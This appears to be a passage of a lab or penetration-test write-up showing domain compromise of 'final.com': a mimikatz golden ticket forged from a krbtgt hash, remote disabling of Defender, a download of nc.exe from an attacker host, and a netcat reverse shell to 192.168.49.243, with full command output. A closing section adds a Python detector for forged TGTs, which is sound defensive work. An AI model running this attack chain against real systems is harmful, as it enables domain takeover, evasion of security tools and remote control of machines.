Using the golden ticket generated on 172.16.243.180, we can now access the .192 host:
```
c:\Users\Administrator\Desktop>mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"
mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:final.com /sid:S-1-5-21-1725955968-4040474791-670206374 /krbtgt:405854caaf49b41e0e585369a001f114 /sids:S-1-5-21-1725955968-4040474791-670206374-519 /ptt
User      : Administrator
Domain    : final.com (FINAL)
SID       : S-1-5-21-1725955968-4040474791-670206374
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-1725955968-4040474791-670206374-519 ;
ServiceKey: 405854caaf49b41e0e585369a001f114 - rc4_hmac_nt
Lifetime  : 8/4/2022 2:41:33 AM ; 8/1/2032 2:41:33 AM ; 8/1/2032 2:41:33 AM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ final.com' successfully submitted for current session

mimikatz(commandline) # exit
Bye!

c:\Users\Administrator\Desktop>more \\dc02.dev.final.com\c$\users\administrator\desktop\proof.txt
more \\dc02.dev.final.com\c$\users\administrator\desktop\proof.txt
3ef3d28e7d7769c0d5825b1a6e5ce5d2
```
```
PS C:\Users\Administrator\Desktop> Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {whoami;ipconfig;hostname}
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {whoami;ipconfig;hostname}
final\administrator

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.16.243.192
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.243.254
dc02

PS C:\Users\Administrator\Desktop> Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose}
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose}
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.

PS C:\Users\Administrator\Desktop> Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {powershell.exe iwr -uri http://192.168.49.243/nc.exe -o c:\Users\Administrator\Desktop\nc.exe}
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {powershell.exe iwr -uri http://192.168.49.243/nc.exe -o c:\Users\Administrator\Desktop\nc.exe}

PS C:\Users\Administrator\Desktop> Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {c:\Users\Administrator\Desktop\nc.exe 192.168.49.243 80 -e cmd.exe}
Invoke-Command -ComputerName dc02.dev.final.com -ScriptBlock {c:\Users\Administrator\Desktop\nc.exe 192.168.49.243 80 -e cmd.exe}
```
```
┌──(kali㉿kali)-[/usr/share/windows-binaries]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 63152
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Administrator.FINAL\Documents>hostname
hostname
dc02

C:\Users\Administrator.FINAL\Documents>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 172.16.243.192
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.243.254

C:\Users\Administrator.FINAL\Documents>whoami
whoami
final\administrator

C:\Users\Administrator.FINAL\Documents>
C:\Users\Administrator.FINAL\Documents>more c:\Users\Administrator\Desktop\proof.txt
more c:\Users\Administrator\Desktop\proof.txt
3ef3d28e7d7769c0d5825b1a6e5ce5d2

C:\Users\Administrator.FINAL\Documents>
```
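The forged ticket above is easy to spot from the responder's side: its Lifetime runs from 2022 to 2032 and it is RC4-encrypted, while a legitimate TGT follows domain policy. As a defender-side check added here (not part of the original write-up), the script below parses a constructed `klist`-style cache listing modelled on that Lifetime line and flags TGTs that exceed the assumed default policy (10 h ticket, 7 d renewal) or use RC4; the sample listing and the policy values are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed klist-style cache listing (not captured from the lab). Ticket #0 mirrors the
# forged TGT above: RC4 key, 2022 start, 2032 end/renew. Ticket #1 is a normal 10 h TGT.
SAMPLE_KLIST = """\
#0>     Client: Administrator @ FINAL.COM
        Server: krbtgt/FINAL.COM @ FINAL.COM
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 8/4/2022 2:41:33 (local)
        End Time:   8/1/2032 2:41:33 (local)
        Renew Time: 8/1/2032 2:41:33 (local)
#1>     Client: jdoe @ FINAL.COM
        Server: krbtgt/FINAL.COM @ FINAL.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 8/4/2022 8:00:00 (local)
        End Time:   8/4/2022 18:00:00 (local)
        Renew Time: 8/11/2022 8:00:00 (local)
"""

MAX_TICKET_LIFE = timedelta(hours=10)  # assumed: Windows default max TGT lifetime
MAX_RENEW_LIFE = timedelta(days=7)     # assumed: Windows default max renewal window
TIME_FMT = "%m/%d/%Y %H:%M:%S"

def parse_tickets(text):
    """Split klist output on '#n>' headers; return one {field: value} dict per ticket."""
    return [dict(re.findall(r"^\s*([A-Za-z ]+?):\s+(.+?)\s*$", block, re.M))
            for block in re.split(r"(?m)^#\d+>", text)[1:]]

def _ts(value):
    return datetime.strptime(value.replace(" (local)", ""), TIME_FMT)

def find_anomalous_tgts(text):
    """Return (client, [reasons]) for krbtgt tickets whose lifetime or key type breaks policy."""
    findings = []
    for t in parse_tickets(text):
        if not t.get("Server", "").lower().startswith("krbtgt/"):
            continue  # only TGTs carry the forged-lifetime signal
        start, end, renew = (_ts(t[k]) for k in ("Start Time", "End Time", "Renew Time"))
        reasons = []
        if end - start > MAX_TICKET_LIFE:
            reasons.append(f"ticket life {end - start} exceeds {MAX_TICKET_LIFE}")
        if renew - start > MAX_RENEW_LIFE:
            reasons.append(f"renew window {renew - start} exceeds {MAX_RENEW_LIFE}")
        if "RC4" in t.get("KerbTicket Encryption Type", ""):
            reasons.append("RC4 TGT where AES is expected (forged from the krbtgt NT hash?)")
        if reasons:
            findings.append((t["Client"], reasons))
    return findings
```

The same three checks map onto KDC events (4768/4769) once ticket encryption type and lifetime fields are available, so the lifetime comparison against domain policy is the part worth centralising.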